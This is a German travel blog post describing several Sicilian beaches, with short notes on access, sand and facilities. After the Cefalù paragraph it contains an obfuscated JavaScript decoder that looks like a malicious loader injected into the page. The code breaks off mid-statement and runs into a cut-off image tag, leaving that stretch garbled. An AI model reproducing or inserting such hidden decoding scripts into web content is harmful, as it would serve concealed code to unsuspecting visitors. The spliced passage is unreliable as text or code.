Badestrände auf Sizilien

Der Sommer und die schönste Zeit im Jahr stehen wieder bevor und viele zieht es auch heuer wieder nach Italien um die schönen Strände dort genießen zu können. Gerade Sizilien ist bei den Touristen sehr beliebt und bietet eine große Vielfalt an Stränden und wunderbarer Natur. Sizilien ist die größte Insel im Mittelmeer, deren geografisches Merkmal der noch immer aktive Vulkan Ätna ist. Die beste Reisezeit, um Sizilien zu besuchen ist das Frühjahr oder der Herbst, da es im Sommer sehr heiß werden kann.

Sizilien bietet wunderbare und malerische Strände, die jedes Urlauberherz höher schlagen lassen. Ein sehr bekannter Strand ist Cefalù. Cefalù liegt an der Nordküste Siziliens und bietet einen sehr feinen Sand, der sich die gesamte Küste entlang zieht. Der Strand befindet sich in der Nähe der Stadt und bietet eine gute Wasserqualität. Man kann sich dort auch Liegestühle und Sonnenschirme anmieten oder einfach am freien Strand liegen. Der Strand hat eine direkte Zufahrtsmöglichkeit und bietet in der Nähe einen kostenpflichtigen Parkplatz.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandung in Cefalù" src="http://www.marinda.de/wp-content/uploads/2011/07/63417_R_by_KlausM_pixelio.jpg" alt="Sizilien" height="364" width="600">Brandung in Cefalù (Foto: © KlausM/pixelio.de)

Der Strand von San Vito lo Campo befindet sich in der Provinz Trapani an der Westküste von Sizilien. Er liegt inmitten eines Naturschutzgebietes und in der Nähe eines alten Fischerdorfes. Im Sand kann man manchmal noch kleine Korallenstücke finden, die eine rosa bis rote Färbung aufweisen. In der gesamten Umgebung sind ab 50m Tiefe noch immer Korallen zu finden, diese dürfen aber nicht berührt oder abgerissen werden, da sie unter Naturschutz stehen.

Calo Rossa ist ein Strand, der in einer kleinen felsenartigen Bucht liegt. Damit man einen schönen Tag am Strand genießen kann, ist eine kleine Klettertour erforderlich, denn der Strand ist nur über kleine Wege erreichbar. Am Strand sind nur wenige Menschen zu finden und man kann das kristallklare Wasser fast ungestört genießen. Der Strand besteht ausschließlich aus Sand und es ist keine touristische Infrastruktur vorhanden.

Ein weiterer traumhafter Strand ist Le Capannine der aus sehr feinem, strahlend weißem Sand besteht. Le Capannine ist direkt anfahrbar und sehr gut erreichbar, daher sind dort auch sehr viele Badeurlauber zu finden. Der Strand ist sehr sauber und ist touristisch erschlossen: es gibt sanitäre Anlagen und überall sieht man die Lichterkette von Bars und Restaurants.

Tipp: Aktuelle Urlaubsangebote für Sizilien gibt es z.B. auf ab-in-den-urlaub.de

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg